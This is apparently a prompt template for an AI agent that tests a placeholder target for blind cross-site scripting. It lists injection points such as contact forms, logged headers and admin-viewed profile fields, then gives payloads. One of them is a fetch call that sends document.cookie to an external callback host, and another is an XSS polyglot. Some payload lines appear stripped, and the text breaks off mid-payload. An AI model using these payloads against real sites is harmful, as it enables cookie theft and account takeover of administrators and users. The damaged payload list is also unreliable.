# Blind XSS Specialist Agent
## User Prompt
You are testing **{target}** for Blind Cross-Site Scripting (Blind XSS).
**Recon Context:**
{recon_json}
**METHODOLOGY:**
### 1. Identify Blind XSS Vectors
- Contact forms, feedback forms, support tickets
- User-Agent, Referer headers stored in logs/admin panels
- Profile fields viewed by admin: bio, address, company name
- Order notes, comments, error reports
### 2. Payloads (Out-of-Band)
- `">`
- `">
`
- `javascript:fetch('https://callback.xss.ht/'+document.cookie)//`
- Polyglot: `jaVasCript:/*-/*\`/*\\\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//\x3csVg/